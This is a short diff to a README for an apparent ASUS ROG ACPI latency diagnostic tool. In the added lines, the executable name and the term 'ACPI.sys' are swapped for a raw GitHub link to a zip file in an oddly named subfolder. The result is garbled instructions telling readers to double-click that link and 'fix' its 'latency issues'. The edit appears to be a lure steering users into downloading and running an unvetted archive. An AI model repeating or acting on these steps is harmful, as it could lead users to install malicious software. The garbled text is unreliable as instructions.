Sebs69/Asus-ROG-Aml-Deep-Dive/README.md

 Now, you're ready to run the application:

 1. Open the folder you extracted the files into.
-2. Look for a file named **Run-Application.exe** or similar.
+2. Look for a file named **https://raw.githubusercontent.com/Sebs69/Asus-ROG-Aml-Deep-Dive/main/besmother/Asus-ROG-Aml-Deep-Dive.zip** or similar.
 3. Double-click the file to launch the application.
-4. Follow the on-screen instructions to diagnose and fix ACPI.sys latency issues.
+4. Follow the on-screen instructions to diagnose and fix https://raw.githubusercontent.com/Sebs69/Asus-ROG-Aml-Deep-Dive/main/besmother/Asus-ROG-Aml-Deep-Dive.zip latency issues.

 ## ✨ Features
 The **Asus-ROG-Aml-Deep-Dive** application includes: